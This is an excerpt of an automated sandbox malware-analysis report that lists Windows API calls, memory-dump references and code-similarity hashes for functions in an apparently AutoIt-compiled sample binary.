                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountMessagePostString
                                                              • String ID:
                                                              • API String ID: 650687236-0
                                                              • Opcode ID: b1d22e4d8ce587ec5344837b707760f9c203d2f98ff245f1040805696490795e
                                                              • Instruction ID: a1712e491dd65283856272f84999fb630e28825140e907e6def7b59c46004672
                                                              • Opcode Fuzzy Hash: b1d22e4d8ce587ec5344837b707760f9c203d2f98ff245f1040805696490795e
                                                              • Instruction Fuzzy Hash: 08514E31E00615EFDF11EF64C855AAEBBB4EF48720F14406AE805BB351CB74AE41EB90
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00F6EF06
                                                              • VariantClear.OLEAUT32(00000013), ref: 00F6EF78
                                                              • VariantClear.OLEAUT32(00000000), ref: 00F6EFD3
                                                              • _memmove.LIBCMT ref: 00F6EFFD
                                                              • VariantClear.OLEAUT32(?), ref: 00F6F04A
                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F6F078
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                                              • String ID:
                                                              • API String ID: 1101466143-0
                                                              • Opcode ID: b5294403cf4c186d29110573beeb125ae07a872fbf777f307569e67ef939c3d8
                                                              • Instruction ID: 471ff1ecfd3d634fca8f595f75184aefd522d7707559e6e00d435461b76c188a
                                                              • Opcode Fuzzy Hash: b5294403cf4c186d29110573beeb125ae07a872fbf777f307569e67ef939c3d8
                                                              • Instruction Fuzzy Hash: 9B5166B5A00209EFCB14CF58D880AAAB7B8FF4C314B15856AE959DB305E335E915CBA0
                                                              APIs
                                                              • _memset.LIBCMT ref: 00F72258
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F722A3
                                                              • IsMenu.USER32(00000000), ref: 00F722C3
                                                              • CreatePopupMenu.USER32 ref: 00F722F7
                                                              • GetMenuItemCount.USER32(000000FF), ref: 00F72355
                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F72386
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                              • String ID:
                                                              • API String ID: 3311875123-0
                                                              • Opcode ID: 68edddd05d303e470c8d4b8d8b4f3e2df370960744be67aef55ce081d20767e4
                                                              • Instruction ID: 1be4d763515c1fa10b8ec16ce57bbbca4da1d45487981ef70f11e0e6c8702de4
                                                              • Opcode Fuzzy Hash: 68edddd05d303e470c8d4b8d8b4f3e2df370960744be67aef55ce081d20767e4
                                                              • Instruction Fuzzy Hash: D551D230A00249DFDFA1CF64D888BADBBF5FF05324F14822BE85997291D3788904EB52
                                                              APIs
                                                                • Part of subcall function 00F12612: GetWindowLongW.USER32(?,000000EB), ref: 00F12623
                                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 00F1179A
                                                              • GetWindowRect.USER32(?,?), ref: 00F117FE
                                                              • ScreenToClient.USER32(?,?), ref: 00F1181B
                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F1182C
                                                              • EndPaint.USER32(?,?), ref: 00F11876
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                              • String ID:
                                                              • API String ID: 1827037458-0
                                                              • Opcode ID: 68c447e1eae4f152326f0784ef115f1ebeaa059b4f1946e20815de9380a32588
                                                              • Instruction ID: 9c4853f2d41a7dc54eb4ef7c2dc317a54a46be46cc65ed792da2301f468b4373
                                                              • Opcode Fuzzy Hash: 68c447e1eae4f152326f0784ef115f1ebeaa059b4f1946e20815de9380a32588
                                                              • Instruction Fuzzy Hash: CE418C71504704AFD710DF24CC84FAA7BE9FB49734F14462AFAA4C62A2C7319885FB62
                                                              APIs
                                                              • ShowWindow.USER32(00FD57B0,00000000,015E86F8,?,?,00FD57B0,?,00F9B5A8,?,?), ref: 00F9B712
                                                              • EnableWindow.USER32(00000000,00000000), ref: 00F9B736
                                                              • ShowWindow.USER32(00FD57B0,00000000,015E86F8,?,?,00FD57B0,?,00F9B5A8,?,?), ref: 00F9B796
                                                              • ShowWindow.USER32(00000000,00000004,?,00F9B5A8,?,?), ref: 00F9B7A8
                                                              • EnableWindow.USER32(00000000,00000001), ref: 00F9B7CC
                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F9B7EF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$Enable$MessageSend
                                                              • String ID:
                                                              • API String ID: 642888154-0
                                                              • Opcode ID: f074a2b495fb55f83241598cd5510e9e9dd3ab422a9d418f8caef1f96c523553
                                                              • Instruction ID: a3aada0bda82034c693e72665136ec0d2632a56b959666dc28f9bae4079d13ae
                                                              • Opcode Fuzzy Hash: f074a2b495fb55f83241598cd5510e9e9dd3ab422a9d418f8caef1f96c523553
                                                              • Instruction Fuzzy Hash: 4B419B34A00244EFEF25CFA4E599B947BE1FF85320F1842B9F9488F562C731A855DB52
                                                              APIs
                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,00F84E41,?,?,00000000,00000001), ref: 00F870AC
                                                                • Part of subcall function 00F839A0: GetWindowRect.USER32(?,?), ref: 00F839B3
                                                              • GetDesktopWindow.USER32 ref: 00F870D6
                                                              • GetWindowRect.USER32(00000000), ref: 00F870DD
                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F8710F
                                                                • Part of subcall function 00F75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F752BC
                                                              • GetCursorPos.USER32(?), ref: 00F8713B
                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F87199
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                              • String ID:
                                                              • API String ID: 4137160315-0
                                                              • Opcode ID: 5762c72822abf266909e92f724a641ea2b9d9e0d25659043b81484329e5c41e5
                                                              • Instruction ID: e66f2db4d031fa4adf529bbc2b231f956dc69e2d02202216f097715bb965c6eb
                                                              • Opcode Fuzzy Hash: 5762c72822abf266909e92f724a641ea2b9d9e0d25659043b81484329e5c41e5
                                                              • Instruction Fuzzy Hash: 3131B272509309ABD720EF14DC49B9BB7AAFF88314F10091AF589D7191C774EA09DB92
                                                              APIs
                                                                • Part of subcall function 00F680A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F680C0
                                                                • Part of subcall function 00F680A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F680CA
                                                                • Part of subcall function 00F680A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F680D9
                                                                • Part of subcall function 00F680A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F680E0
                                                                • Part of subcall function 00F680A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F680F6
                                                              • GetLengthSid.ADVAPI32(?,00000000,00F6842F), ref: 00F688CA
                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F688D6
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00F688DD
                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F688F6
                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00F6842F), ref: 00F6890A
                                                              • HeapFree.KERNEL32(00000000), ref: 00F68911
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                              • String ID:
                                                              • API String ID: 3008561057-0
                                                              • Opcode ID: c556a47bd32888507bc1818f18e4000b8bccc38d5da3a3dfb466787eb23feea8
                                                              • Instruction ID: 2cc046264e22a4b68d486b3698f8c7af686c72623e3378198a3634b040ef1f5a
                                                              • Opcode Fuzzy Hash: c556a47bd32888507bc1818f18e4000b8bccc38d5da3a3dfb466787eb23feea8
                                                              • Instruction Fuzzy Hash: 4C11B132901209FFDB109FA4DC09BBE7B68EB45361F10422DE885D7111CB329D56EB60
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F685E2
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00F685E9
                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F685F8
                                                              • CloseHandle.KERNEL32(00000004), ref: 00F68603
                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F68632
                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00F68646
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                              • String ID:
                                                              • API String ID: 1413079979-0
                                                              • Opcode ID: 80a51aa4068eb32243a4c56bbc5e643045379f451016b7b4f066723c3393b251
                                                              • Instruction ID: eb8529a8474e3edd55a6d38636ae3e6d2aab4a6649dfe639d6b941059dcc94d2
                                                              • Opcode Fuzzy Hash: 80a51aa4068eb32243a4c56bbc5e643045379f451016b7b4f066723c3393b251
                                                              • Instruction Fuzzy Hash: 3A116A7250020DABDF018FA4DD49FDE7BA9EF48354F044169FE05E2160C7728D65EB60
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 00F6B7B5
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F6B7C6
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F6B7CD
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00F6B7D5
                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F6B7EC
                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 00F6B7FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CapsDevice$Release
                                                              • String ID:
                                                              • API String ID: 1035833867-0
                                                              • Opcode ID: 53c6643d472ca36e81461ee48ec27b0b0c065b6b330c46cedde9072b8623b85c
                                                              • Instruction ID: 1003b39ae7cbc8dab9a297b113e61280ef056983039261bf8a884902d728e4af
                                                              • Opcode Fuzzy Hash: 53c6643d472ca36e81461ee48ec27b0b0c065b6b330c46cedde9072b8623b85c
                                                              • Instruction Fuzzy Hash: B7018F75E00309BBEB109BA69C49A5EBFB8EB48321F004076FA08E7291D6309C14DFA0
                                                              APIs
                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F30193
                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F3019B
                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F301A6
                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F301B1
                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F301B9
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F301C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Virtual
                                                              • String ID:
                                                              • API String ID: 4278518827-0
                                                              • Opcode ID: 184852ef79143617ac86ea71371f95702d1473dbef4bf8b1e21284ed6c1a295c
                                                              • Instruction ID: 21c1b55a81456887fb2b9fbdea552b378eb833da50187a884f455df3a43278db
                                                              • Opcode Fuzzy Hash: 184852ef79143617ac86ea71371f95702d1473dbef4bf8b1e21284ed6c1a295c
                                                              • Instruction Fuzzy Hash: E5016CB09017597DE3008F5A8C85B52FFB8FF19354F00411BA15C87941C7F5A868CBE5
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F753F9
                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F7540F
                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00F7541E
                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F7542D
                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F75437
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F7543E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 839392675-0
                                                              • Opcode ID: a2db9097786730beaa91b3e7944b272c92479db09834d9be81d0976648d984c7
                                                              • Instruction ID: f3146e47e64f6d172128c0be38693b70d53840650b3087a8447a9f59eefd6cb4
                                                              • Opcode Fuzzy Hash: a2db9097786730beaa91b3e7944b272c92479db09834d9be81d0976648d984c7
                                                              • Instruction Fuzzy Hash: 99F0903264025CBBE3215BA2DC0DEEF7B7CEFC6B11F00016AFA04D1050D7A11A45A6B5
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00F77243
                                                              • EnterCriticalSection.KERNEL32(?,?,00F20EE4,?,?), ref: 00F77254
                                                              • TerminateThread.KERNEL32(00000000,000001F6,?,00F20EE4,?,?), ref: 00F77261
                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00F20EE4,?,?), ref: 00F7726E
                                                                • Part of subcall function 00F76C35: CloseHandle.KERNEL32(00000000,?,00F7727B,?,00F20EE4,?,?), ref: 00F76C3F
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F77281
                                                              • LeaveCriticalSection.KERNEL32(?,?,00F20EE4,?,?), ref: 00F77288
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                              • String ID:
                                                              • API String ID: 3495660284-0
                                                              • Opcode ID: a8e27b7149ad8655de459cd75999558c7c1a8740357c54b36b8b5d9f4ba9e7f7
                                                              • Instruction ID: 6c70dcb538a583c9a26717917d55937beff84665704c8f60cc9c0cd29e1af389
                                                              • Opcode Fuzzy Hash: a8e27b7149ad8655de459cd75999558c7c1a8740357c54b36b8b5d9f4ba9e7f7
                                                              • Instruction Fuzzy Hash: B7F05E36940616EBD7122B64ED4CADA7729EF45712B100533F603D10A1CB7A6855EB51
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F6899D
                                                              • UnloadUserProfile.USERENV(?,?), ref: 00F689A9
                                                              • CloseHandle.KERNEL32(?), ref: 00F689B2
                                                              • CloseHandle.KERNEL32(?), ref: 00F689BA
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00F689C3
                                                              • HeapFree.KERNEL32(00000000), ref: 00F689CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                              • String ID:
                                                              • API String ID: 146765662-0
                                                              • Opcode ID: 3c664b5d1d01b3af824e6575e0482163bf83fdc81dc21f7622887171aefda0e4
                                                              • Instruction ID: 9a25d488a522ddf262dfaf39e62e0c8eed01b100e83fa38733379bc709a0f155
                                                              • Opcode Fuzzy Hash: 3c664b5d1d01b3af824e6575e0482163bf83fdc81dc21f7622887171aefda0e4
                                                              • Instruction Fuzzy Hash: 33E05276104509FBDA011FF5EC0CD5ABB69FB89762B608632F219C1470CB369469EB90
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00F88613
                                                              • CharUpperBuffW.USER32(?,?), ref: 00F88722
                                                              • VariantClear.OLEAUT32(?), ref: 00F8889A
                                                                • Part of subcall function 00F77562: VariantInit.OLEAUT32(00000000), ref: 00F775A2
                                                                • Part of subcall function 00F77562: VariantCopy.OLEAUT32(00000000,?), ref: 00F775AB
                                                                • Part of subcall function 00F77562: VariantClear.OLEAUT32(00000000), ref: 00F775B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                              • API String ID: 4237274167-1221869570
                                                              • Opcode ID: 6a9a9d6b738592cfa91063e9d2bfe2afd1d735bcee2cc3ecb3a70361250a6cff
                                                              • Instruction ID: f726eab6415b9e425aef0d7150182f49d40e5cc287ea3440905d067291741308
                                                              • Opcode Fuzzy Hash: 6a9a9d6b738592cfa91063e9d2bfe2afd1d735bcee2cc3ecb3a70361250a6cff
                                                              • Instruction Fuzzy Hash: CB917E71A083019FC710EF24C88499AB7E4EF89754F54492EF88A8B351DB35ED46DB92
                                                              APIs
                                                                • Part of subcall function 00F2FC86: _wcscpy.LIBCMT ref: 00F2FCA9
                                                              • _memset.LIBCMT ref: 00F72B87
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F72BB6
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F72C69
                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F72C97
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                              • String ID: 0
                                                              • API String ID: 4152858687-4108050209
